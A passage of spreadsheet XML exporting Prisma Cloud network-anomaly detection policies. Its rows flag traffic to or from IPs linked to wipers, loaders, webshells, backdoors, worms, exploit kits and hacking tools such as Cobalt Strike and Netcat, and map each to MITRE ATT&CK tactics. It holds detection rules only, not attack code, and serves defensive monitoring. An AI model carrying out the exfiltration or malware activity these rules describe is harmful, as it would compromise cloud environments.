          <t>network</t>
        </is>
      </c>
      <c r="Q1513" t="inlineStr">
        <is>
          <t>TA0010</t>
        </is>
      </c>
      <c r="R1513" t="inlineStr">
        <is>
          <t>T1537 - Transfer Data to Cloud Account (TA0010)</t>
        </is>
      </c>
      <c r="S1513" t="inlineStr">
        <is>
          <t>Exfiltration,Execution,AutoFocus Threat</t>
        </is>
      </c>
      <c r="T1513" t="b">
        <v>0</v>
      </c>
      <c r="U1513" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1513" t="inlineStr">
        <is>
          <t>anomaly_network</t>
        </is>
      </c>
      <c r="W1513" t="inlineStr">
        <is>
          <t>Identifies suspicious connections by inspecting the accepted outbound traffic of your cloud environment. A cloud instance inside your environment communicated with an external host, whose IP address has been associated by AutoFocus to malicious activity (wiper).
        The sole intention of the wiper malware is to destroy data on the target machine. Unlike other attacks like ransomware, which often seeks financial gain, wipers are typically employed to destroy data and cover the attacker’s tracks.</t>
        </is>
      </c>
      <c r="X1513"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13" t="inlineStr"/>
      <c r="Z1513" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AA1513" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB1513" t="inlineStr">
        <is>
          <t>2023-07-20 17:32:47</t>
        </is>
      </c>
      <c r="AC1513" t="inlineStr"/>
      <c r="AD1513" t="b">
        <v>1</v>
      </c>
      <c r="AE1513" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1513" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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3" t="inlineStr">
        <is>
          <t>270d27ed-104d-4716-974c-b2d07be1d6cf</t>
        </is>
      </c>
      <c r="AI1513" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AJ1513" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1513" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1514">
      <c r="A1514"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14" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1514" s="2" t="inlineStr"/>
      <c r="D1514" t="inlineStr"/>
      <c r="E1514" t="inlineStr"/>
      <c r="F1514" t="inlineStr"/>
      <c r="G1514" t="b">
        <v>1</v>
      </c>
      <c r="H15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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1514" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="K1514" t="inlineStr">
        <is>
          <t>Traffic to a suspicious IP address associated with Loader activity</t>
        </is>
      </c>
      <c r="L1514" t="inlineStr">
        <is>
          <t>MALWARE</t>
        </is>
      </c>
      <c r="M1514" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1514" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1514" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1514" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="Q1514" t="inlineStr">
        <is>
          <t>TA0010</t>
        </is>
      </c>
      <c r="R1514" t="inlineStr">
        <is>
          <t>T1537 - Transfer Data to Cloud Account (TA0010)</t>
        </is>
      </c>
      <c r="S1514" t="inlineStr">
        <is>
          <t>Exfiltration,Execution,AutoFocus Threat</t>
        </is>
      </c>
      <c r="T1514" t="b">
        <v>0</v>
      </c>
      <c r="U1514" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1514" t="inlineStr">
        <is>
          <t>anomaly_network</t>
        </is>
      </c>
      <c r="W1514" t="inlineStr">
        <is>
          <t>Identifies suspicious connections by inspecting the accepted outbound traffic of your cloud environment. A cloud instance inside your environment communicated with an external host, whose IP address has been associated by AutoFocus to malicious activity (loader).
        Loaders retrieve malicious executables or payloads from an attacker-controlled server.</t>
        </is>
      </c>
      <c r="X1514"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14" t="inlineStr"/>
      <c r="Z1514" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AA1514" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB1514" t="inlineStr">
        <is>
          <t>2023-07-20 17:35:39</t>
        </is>
      </c>
      <c r="AC1514" t="inlineStr"/>
      <c r="AD1514" t="b">
        <v>1</v>
      </c>
      <c r="AE1514" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1514" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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4" t="inlineStr">
        <is>
          <t>fe3b3ee2-b596-4bf0-9e2f-1dadaab447f7</t>
        </is>
      </c>
      <c r="AI1514" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AJ1514" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1514" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1515">
      <c r="A1515"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15" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1515" s="2" t="inlineStr"/>
      <c r="D1515" t="inlineStr"/>
      <c r="E1515" t="inlineStr"/>
      <c r="F1515" t="inlineStr"/>
      <c r="G1515" t="b">
        <v>1</v>
      </c>
      <c r="H15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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1515" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="K1515" t="inlineStr">
        <is>
          <t>Traffic from a suspicious IP address associated with Linux Malware activity</t>
        </is>
      </c>
      <c r="L1515" t="inlineStr">
        <is>
          <t>INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M1515" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1515" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1515" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1515" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="Q1515" t="inlineStr">
        <is>
          <t>TA0003</t>
        </is>
      </c>
      <c r="R1515" t="inlineStr">
        <is>
          <t>T1078 - Valid Accounts (TA0003) (TA0003)</t>
        </is>
      </c>
      <c r="S1515" t="inlineStr">
        <is>
          <t>Attack Path Rule,AutoFocus Threat,Initial Access</t>
        </is>
      </c>
      <c r="T1515" t="b">
        <v>0</v>
      </c>
      <c r="U1515" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1515" t="inlineStr">
        <is>
          <t>anomaly_network</t>
        </is>
      </c>
      <c r="W1515" t="inlineStr">
        <is>
          <t>Identifies suspicious connections by inspecting the accepted inbound traffic to your cloud environment. A host outside your environment with an IP address previously associated by AutoFocus to malicious activity (Linux malware), is connecting to one of your cloud hosts.
        Linux malware Includes viruses, trojans, worms and other types of malware that affect the popular open-source operating system.</t>
        </is>
      </c>
      <c r="X1515"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15" t="inlineStr"/>
      <c r="Z1515" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AA1515" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1515" t="inlineStr">
        <is>
          <t>2023-06-23 07:08:01</t>
        </is>
      </c>
      <c r="AC1515" t="inlineStr"/>
      <c r="AD1515" t="b">
        <v>1</v>
      </c>
      <c r="AE1515" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1515" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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5" t="inlineStr">
        <is>
          <t>fbc831ad-c685-4892-9955-ca86740215e8</t>
        </is>
      </c>
      <c r="AI1515" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AJ1515" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1515" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1516">
      <c r="A1516"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16" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1516" s="2" t="inlineStr"/>
      <c r="D1516" t="inlineStr"/>
      <c r="E1516" t="inlineStr"/>
      <c r="F1516" t="inlineStr"/>
      <c r="G1516" t="b">
        <v>1</v>
      </c>
      <c r="H15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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1516" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="K1516" t="inlineStr">
        <is>
          <t>Traffic from a suspicious IP address associated with Webshell activity</t>
        </is>
      </c>
      <c r="L1516" t="inlineStr">
        <is>
          <t>INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M1516" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1516" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1516" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1516" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="Q1516" t="inlineStr">
        <is>
          <t>TA0003</t>
        </is>
      </c>
      <c r="R1516" t="inlineStr">
        <is>
          <t>T1078 - Valid Accounts (TA0003) (TA0003)</t>
        </is>
      </c>
      <c r="S1516" t="inlineStr">
        <is>
          <t>Attack Path Rule,AutoFocus Threat,Initial Access</t>
        </is>
      </c>
      <c r="T1516" t="b">
        <v>0</v>
      </c>
      <c r="U1516" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1516" t="inlineStr">
        <is>
          <t>anomaly_network</t>
        </is>
      </c>
      <c r="W1516" t="inlineStr">
        <is>
          <t>Identifies suspicious connections by inspecting the accepted inbound traffic to your cloud environment. A host outside your environment with an IP address previously associated by AutoFocus to malicious activity (webshell), is connecting to one of your cloud hosts.
        A webshell is a script that can be uploaded to a web server to enable remote administration of the machine. Infected web servers can be either Internet-facing or internal to the network, where the web shell is used to pivot further to internal hosts.</t>
        </is>
      </c>
      <c r="X1516"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16" t="inlineStr"/>
      <c r="Z1516" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AA1516" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1516" t="inlineStr">
        <is>
          <t>2023-08-04 06:09:47</t>
        </is>
      </c>
      <c r="AC1516" t="inlineStr"/>
      <c r="AD1516" t="b">
        <v>1</v>
      </c>
      <c r="AE1516" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1516" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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6" t="inlineStr">
        <is>
          <t>016d2702-232b-4332-a41d-2767cb1f6205</t>
        </is>
      </c>
      <c r="AI1516" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AJ1516" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1516" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1517">
      <c r="A1517"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17" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1517" s="2" t="inlineStr"/>
      <c r="D1517" t="inlineStr"/>
      <c r="E1517" t="inlineStr"/>
      <c r="F1517" t="inlineStr"/>
      <c r="G1517" t="b">
        <v>1</v>
      </c>
      <c r="H15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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1517" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="K1517" t="inlineStr">
        <is>
          <t>Traffic to a suspicious IP address associated with Hacking Tool activity</t>
        </is>
      </c>
      <c r="L1517" t="inlineStr">
        <is>
          <t>MALWARE</t>
        </is>
      </c>
      <c r="M1517" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1517" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1517" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1517" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="Q1517" t="inlineStr">
        <is>
          <t>TA0010</t>
        </is>
      </c>
      <c r="R1517" t="inlineStr">
        <is>
          <t>T1537 - Transfer Data to Cloud Account (TA0010)</t>
        </is>
      </c>
      <c r="S1517" t="inlineStr">
        <is>
          <t>Attack Path Rule,AutoFocus Threat,Execution,Exfiltration</t>
        </is>
      </c>
      <c r="T1517" t="b">
        <v>0</v>
      </c>
      <c r="U1517" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1517" t="inlineStr">
        <is>
          <t>anomaly_network</t>
        </is>
      </c>
      <c r="W1517" t="inlineStr">
        <is>
          <t>Identifies suspicious connections by inspecting the accepted outbound traffic of your cloud environment. A cloud instance inside your environment communicated with an external host, whose IP address has been associated by AutoFocus to malicious activity (hacking tool).
        Hacking tools are commonly leveraged by attackers to infect, maintain, administer victim machines, and/or perform denial of service attacks. Some examples of hacking tools are Metasploit and Cobalt Strike. Hacking tools can also include administration tools that can be benign or malicious, like Microsoft’s PSEXEC or Netcat.</t>
        </is>
      </c>
      <c r="X1517"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17" t="inlineStr"/>
      <c r="Z1517" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AA1517" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1517" t="inlineStr">
        <is>
          <t>2023-08-04 06:09:47</t>
        </is>
      </c>
      <c r="AC1517" t="inlineStr"/>
      <c r="AD1517" t="b">
        <v>1</v>
      </c>
      <c r="AE1517" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1517" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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7" t="inlineStr">
        <is>
          <t>028edd58-52b0-4b6b-8e18-80c7ca9d7cdc</t>
        </is>
      </c>
      <c r="AI1517" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AJ1517" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1517" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1518">
      <c r="A1518"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18" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1518" s="2" t="inlineStr"/>
      <c r="D1518" t="inlineStr"/>
      <c r="E1518" t="inlineStr"/>
      <c r="F1518" t="inlineStr"/>
      <c r="G1518" t="b">
        <v>1</v>
      </c>
      <c r="H15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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1518" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="K1518" t="inlineStr">
        <is>
          <t>Traffic to a suspicious IP address associated with Backdoor activity</t>
        </is>
      </c>
      <c r="L1518" t="inlineStr">
        <is>
          <t>MALWARE</t>
        </is>
      </c>
      <c r="M1518" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1518" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1518" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1518" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="Q1518" t="inlineStr">
        <is>
          <t>TA0010</t>
        </is>
      </c>
      <c r="R1518" t="inlineStr">
        <is>
          <t>T1537 - Transfer Data to Cloud Account (TA0010)</t>
        </is>
      </c>
      <c r="S1518" t="inlineStr">
        <is>
          <t>Exfiltration,Execution,Attack Path Rule,AutoFocus Threat</t>
        </is>
      </c>
      <c r="T1518" t="b">
        <v>0</v>
      </c>
      <c r="U1518" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1518" t="inlineStr">
        <is>
          <t>anomaly_network</t>
        </is>
      </c>
      <c r="W1518" t="inlineStr">
        <is>
          <t>Identifies suspicious connections by inspecting the accepted outbound traffic from your cloud environment. A host deployed within your cloud is connecting to an external host, whose IP address was identified by AutoFocus for malicious backdoor activity.
        A backdoor is a type of malware that allows remote access of the computer where the malware is installed, while bypassing the authentication mechanisms in place. They can also be used to take control of the affected computer, allowing attackers to steal credentials and establish connections without being found.</t>
        </is>
      </c>
      <c r="X1518"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18" t="inlineStr"/>
      <c r="Z1518" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AA1518" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB1518" t="inlineStr">
        <is>
          <t>2023-07-20 17:35:00</t>
        </is>
      </c>
      <c r="AC1518" t="inlineStr"/>
      <c r="AD1518" t="b">
        <v>1</v>
      </c>
      <c r="AE1518" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1518" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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8" t="inlineStr">
        <is>
          <t>361cf3cf-54f1-43fd-b474-b960b50eb6d5</t>
        </is>
      </c>
      <c r="AI1518" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AJ1518" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1518" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1519">
      <c r="A1519"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19" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1519" s="2" t="inlineStr"/>
      <c r="D1519" t="inlineStr"/>
      <c r="E1519" t="inlineStr"/>
      <c r="F1519" t="inlineStr"/>
      <c r="G1519" t="b">
        <v>1</v>
      </c>
      <c r="H15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19" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1519" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="K1519" t="inlineStr">
        <is>
          <t>Traffic to a suspicious IP address associated with Linux Malware activity</t>
        </is>
      </c>
      <c r="L1519" t="inlineStr">
        <is>
          <t>MALWARE</t>
        </is>
      </c>
      <c r="M1519" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1519" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1519" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1519" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="Q1519" t="inlineStr">
        <is>
          <t>TA0010</t>
        </is>
      </c>
      <c r="R1519" t="inlineStr">
        <is>
          <t>T1537 - Transfer Data to Cloud Account (TA0010)</t>
        </is>
      </c>
      <c r="S1519" t="inlineStr">
        <is>
          <t>Exfiltration,Execution,Attack Path Rule,AutoFocus Threat</t>
        </is>
      </c>
      <c r="T1519" t="b">
        <v>0</v>
      </c>
      <c r="U1519" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1519" t="inlineStr">
        <is>
          <t>anomaly_network</t>
        </is>
      </c>
      <c r="W1519" t="inlineStr">
        <is>
          <t>Identifies suspicious connections by inspecting the accepted outbound traffic of your cloud environment. A cloud instance inside your environment communicated with an external host, whose IP address has been associated by AutoFocus to malicious activity (Linux malware).
        Linux malware Includes viruses, trojans, worms and other types of malware that affect the popular open-source operating system.</t>
        </is>
      </c>
      <c r="X1519"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19" t="inlineStr"/>
      <c r="Z1519" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AA1519" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB1519" t="inlineStr">
        <is>
          <t>2023-07-20 17:26:57</t>
        </is>
      </c>
      <c r="AC1519" t="inlineStr"/>
      <c r="AD1519" t="b">
        <v>1</v>
      </c>
      <c r="AE1519" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1519" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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19" t="inlineStr">
        <is>
          <t>f66c0d27-0e03-4216-b94c-355d0b0ad167</t>
        </is>
      </c>
      <c r="AI1519" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AJ1519" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1519" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1520">
      <c r="A1520"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20" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1520" s="2" t="inlineStr"/>
      <c r="D1520" t="inlineStr"/>
      <c r="E1520" t="inlineStr"/>
      <c r="F1520" t="inlineStr"/>
      <c r="G1520" t="b">
        <v>1</v>
      </c>
      <c r="H15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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1520" t="inlineStr">
        <is>
          <t>unusual_port_proto_network_anomaly</t>
        </is>
      </c>
      <c r="K1520" t="inlineStr">
        <is>
          <t>Traffic on unusual port to a server outside monitored cloud accounts</t>
        </is>
      </c>
      <c r="L1520" t="inlineStr">
        <is>
          <t>DEFENSE_EVASION</t>
        </is>
      </c>
      <c r="M1520" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1520" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1520" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1520" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="Q1520" t="inlineStr">
        <is>
          <t>TA0003</t>
        </is>
      </c>
      <c r="R1520" t="inlineStr">
        <is>
          <t>T1078 - Valid Accounts (TA0003) (TA0003)</t>
        </is>
      </c>
      <c r="S1520" t="inlineStr">
        <is>
          <t>Evasion</t>
        </is>
      </c>
      <c r="T1520" t="b">
        <v>0</v>
      </c>
      <c r="U1520" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1520" t="inlineStr">
        <is>
          <t>anomaly_network</t>
        </is>
      </c>
      <c r="W1520" t="inlineStr">
        <is>
          <t>Identifies accepted network traffic from a client host inside your cloud environment to an external server host, using a server port not previously seen in the VPC.</t>
        </is>
      </c>
      <c r="X1520" t="inlineStr">
        <is>
          <t>1. Investigate your client host to determine if the unusual server port represents unauthorized behavior and the outbound traffic should be blocked.
        2. Review the communication between your client host and the external server host to determine if it conforms with your network policies.</t>
        </is>
      </c>
      <c r="Y1520" t="inlineStr"/>
      <c r="Z1520" t="inlineStr">
        <is>
          <t>unusual_port_proto_network_anomaly</t>
        </is>
      </c>
      <c r="AA1520" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1520" t="inlineStr">
        <is>
          <t>2023-03-17 04:14:05</t>
        </is>
      </c>
      <c r="AC1520" t="inlineStr"/>
      <c r="AD1520" t="b">
        <v>1</v>
      </c>
      <c r="AE1520" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1520" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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0" t="inlineStr">
        <is>
          <t>64a1b256-a291-3172-98c7-876332a018f4</t>
        </is>
      </c>
      <c r="AI1520" t="inlineStr">
        <is>
          <t>unusual_port_proto_network_anomaly</t>
        </is>
      </c>
      <c r="AJ1520" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1520" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1521">
      <c r="A1521"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21" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1521" s="2" t="inlineStr"/>
      <c r="D1521" t="inlineStr"/>
      <c r="E1521" t="inlineStr"/>
      <c r="F1521" t="inlineStr"/>
      <c r="G1521" t="b">
        <v>1</v>
      </c>
      <c r="H15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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1521" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="K1521" t="inlineStr">
        <is>
          <t>Traffic from a suspicious IP address associated with Exploit Kit activity</t>
        </is>
      </c>
      <c r="L1521" t="inlineStr">
        <is>
          <t>INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M1521" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1521" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1521" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1521" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="Q1521" t="inlineStr">
        <is>
          <t>TA0003</t>
        </is>
      </c>
      <c r="R1521" t="inlineStr">
        <is>
          <t>T1078 - Valid Accounts (TA0003) (TA0003)</t>
        </is>
      </c>
      <c r="S1521" t="inlineStr">
        <is>
          <t>Attack Path Rule,AutoFocus Threat,Initial Access</t>
        </is>
      </c>
      <c r="T1521" t="b">
        <v>0</v>
      </c>
      <c r="U1521" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1521" t="inlineStr">
        <is>
          <t>anomaly_network</t>
        </is>
      </c>
      <c r="W1521" t="inlineStr">
        <is>
          <t>Identifies suspicious connections by inspecting the accepted inbound traffic to your cloud environment. A host outside your environment with an IP address previously associated by AutoFocus to malicious activity (exploit kit), is connecting to one of your cloud hosts.
        An exploit kit is a utility program that attackers use to launch exploits against vulnerable applications. Usually done on a mass scale, exploit kits are often leveraged to distribute additional malware. Exploit kits are commonly packaged with exploits that target commonly installed software like Adobe Flash and Java.</t>
        </is>
      </c>
      <c r="X1521"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21" t="inlineStr"/>
      <c r="Z1521" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AA1521" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1521" t="inlineStr">
        <is>
          <t>2023-08-04 06:09:47</t>
        </is>
      </c>
      <c r="AC1521" t="inlineStr"/>
      <c r="AD1521" t="b">
        <v>1</v>
      </c>
      <c r="AE1521" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1521" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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1" t="inlineStr">
        <is>
          <t>48189c87-b39d-4261-a49e-a6ba56dc6772</t>
        </is>
      </c>
      <c r="AI1521" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AJ1521" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1521" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1522">
      <c r="A1522"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22" s="2" t="inlineStr">
        <is>
          <t>REVIEW</t>
        </is>
      </c>
      <c r="C1522" s="2" t="inlineStr"/>
      <c r="D1522" t="n">
        <v>0</v>
      </c>
      <c r="E1522" t="n">
        <v>0</v>
      </c>
      <c r="F1522" t="n">
        <v>1</v>
      </c>
      <c r="G1522" t="b">
        <v>1</v>
      </c>
      <c r="H15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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1522" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="K1522" t="inlineStr">
        <is>
          <t>Traffic to a suspicious IP address associated with Worm activity</t>
        </is>
      </c>
      <c r="L1522" t="inlineStr">
        <is>
          <t>MALWARE</t>
        </is>
      </c>
      <c r="M1522" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1522" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1522" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1522" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="Q1522" t="inlineStr">
        <is>
          <t>TA0010</t>
        </is>
      </c>
      <c r="R1522" t="inlineStr">
        <is>
          <t>T1537 - Transfer Data to Cloud Account (TA0010)</t>
        </is>
      </c>
      <c r="S1522" t="inlineStr">
        <is>
          <t>Exfiltration,Execution,AutoFocus Threat</t>
        </is>
      </c>
      <c r="T1522" t="b">
        <v>0</v>
      </c>
      <c r="U1522" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1522" t="inlineStr">
        <is>
          <t>anomaly_network</t>
        </is>
      </c>
      <c r="W1522" t="inlineStr">
        <is>
          <t>Identifies suspicious connections by inspecting the accepted outbound traffic of your cloud environment. A cloud instance inside your environment communicated with an external host, whose IP address has been associated by AutoFocus to malicious activity (worm).
        A computer worm is a standalone malware family that replicates itself in order to spread to other computers. It often uses a computer network to spread itself, relying on security failures to propagate across networks.</t>
        </is>
      </c>
      <c r="X1522"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22" t="inlineStr"/>
      <c r="Z1522" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AA1522" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB1522" t="inlineStr">
        <is>
          <t>2023-07-20 17:37:04</t>
        </is>
      </c>
      <c r="AC1522" t="inlineStr"/>
      <c r="AD1522" t="b">
        <v>1</v>
      </c>
